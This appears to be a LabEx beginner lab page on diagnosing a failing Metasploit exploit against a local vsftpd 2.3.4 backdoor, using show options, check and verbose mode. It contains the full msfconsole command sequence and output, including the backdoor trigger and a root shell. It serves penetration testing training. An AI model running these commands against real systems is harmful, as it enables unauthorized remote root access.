LabEx
Log InJoin Free

Troubleshoot a Failing Exploit in Metasploit

Kali LinuxBeginner
Practice Now

Introduction

Metasploit is a powerful penetration testing framework that makes hacking simple. However, even with the best tools, exploits can fail for various reasons: incorrect target information, a patched system, or network issues. Knowing how to diagnose and fix these failures is a critical skill for any security professional.

In this lab, you will learn the basic workflow for troubleshooting a failing exploit in Metasploit. We will intentionally misconfigure an exploit, observe the failure, and then use Metasploit's built-in tools to identify and correct the problem. You will learn to use commands like show options, check, and the Verbose setting to get the information you need to succeed.

For this lab, a vulnerable FTP server has been started in the background on your local machine, which will serve as our target.

Select an exploit and set incorrect options

In this step, we will launch the Metasploit Framework console, select an exploit module, and intentionally configure it with an incorrect option to simulate a common user error. This will set the stage for the troubleshooting process.

First, open your terminal and start the Metasploit console. We use the -q (quiet) flag to skip the banner and speed up the loading process.

msfconsole -q

Once you are at the msf6 > prompt, we will search for an exploit targeting the vsftpd service.

search vsftpd

You will see a list of modules. We are interested in the exploit/unix/ftp/vsftpd_234_backdoor. Let's select it using the use command.

use exploit/unix/ftp/vsftpd_234_backdoor

Your prompt will change to indicate that the exploit module is now active. Now, we need to configure the target. The most important option is RHOSTS, which stands for Remote Hosts. We will deliberately set this to an incorrect IP address.

set RHOSTS 192.168.1.100

You will see a confirmation that RHOSTS has been set. We have now prepared an exploit that is guaranteed to fail.

Run the exploit and observe the failure message

In this step, you will execute the misconfigured exploit and learn to interpret the resulting failure message. This is the first and most crucial part of troubleshooting.

With the vsftpd_234_backdoor exploit selected and the incorrect RHOSTS set, let's try to run it. You can use either the run or exploit command.

run

The exploit will attempt to connect to the IP address we provided (192.168.1.100). Since this host is not reachable from the lab environment, the exploit will fail. You will see an output similar to this:

[*] 192.168.1.100:21 - The target is not exploitable.
[*] Exploit completed, but no session was created.

The message The target is not exploitable or a similar connection error message is a clear indicator that Metasploit could not reach or interact with the target service. This tells us the problem is likely related to networking or the target host configuration.

Use the show options command to review configuration

In this step, after seeing a failure, the first logical action is to review our settings. The show options command is the primary tool for this task. It displays all the configurable parameters for the current module.

Let's check the options we have set for our exploit.

show options

This command will display a table of options for the vsftpd_234_backdoor exploit:

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting    Required  Description
   ----    ---------------    --------  -----------
   RHOSTS  192.168.1.100      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21                 yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Look closely at the Current Setting for RHOSTS. It's 192.168.1.100, which we know is incorrect. The vulnerable service for this lab is running on the local machine. The IP address for the local machine is 127.0.0.1.

Let's correct the RHOSTS value.

set RHOSTS 127.0.0.1

Now, if you run show options again, you will see the RHOSTS value has been updated correctly.

Use the check command to test for exploitability

In this step, you'll learn to use the check command. Before running an exploit, it's often wise to check if the target is actually vulnerable. The check command allows you to do this safely, without actually executing the exploit payload. Note that not all modules support this feature.

Now that we have corrected the RHOSTS option, let's use check to see if Metasploit thinks the target is vulnerable.

check

If the target is configured correctly and the service is vulnerable, you should see a positive confirmation message.

[*] 127.0.0.1:21 - The target is vulnerable.

This message, The target is vulnerable, gives us high confidence that the exploit will succeed when we run it. It confirms that Metasploit was able to connect to the target and verify the presence of the backdoor. If it had failed, we would need to investigate further, but for now, this is a very good sign.

Set the Verbose option to true and re-run for more details

In this step, you will learn about the Verbose option. Sometimes, even when check succeeds, an exploit might fail. To get more insight into what the exploit is doing behind the scenes, you can enable verbose logging. This is a global setting that affects all modules.

Let's enable verbose mode using the setg command, which sets a value globally.

setg Verbose true

Now, with verbose mode enabled and the correct RHOSTS, let's run the exploit again.

run

This time, you will see much more detailed output. The verbose logging shows you the step-by-step process of the exploit, including connection attempts and data being sent. Most importantly, the exploit should now succeed.

[*] 127.0.0.1:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 127.0.0.1:21 - USER: Sending "USER back:)"
[*] 127.0.0.1:21 - PASS: Sending "PASS moor"
[+] 127.0.0.1:21 - Found shell.
[*] Command shell session 1 opened (127.0.0.1:43999 -> 127.0.0.1:6200) at 2023-10-27 10:00:00 -0400

Success! The message Command shell session 1 opened confirms that you have successfully compromised the target. You now have a command shell on the remote system. You can test it by running a simple command like whoami.

whoami

You should see the output root. To exit the shell and return to the Metasploit prompt, press Ctrl + C or type exit.

Summary

Congratulations on completing the lab! You have successfully learned the fundamental process for troubleshooting a failing exploit in the Metasploit Framework.

In this lab, you practiced a systematic approach to problem-solving:

  1. Observe Failure: You first ran a misconfigured exploit to see it fail.
  2. Review Options: You used show options to inspect the configuration and identify an incorrect RHOSTS value.
  3. Check Vulnerability: You used the check command to safely verify that the target was vulnerable after correcting the configuration.
  4. Get More Detail: You learned to use setg Verbose true to get detailed, step-by-step output, which is invaluable for diagnosing more complex issues.

These core skills will help you overcome common obstacles and use Metasploit more effectively in your penetration testing activities.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux